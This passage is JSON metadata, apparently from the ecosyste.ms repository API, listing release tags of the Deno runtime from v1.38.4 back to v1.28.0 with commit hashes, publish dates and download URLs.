at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0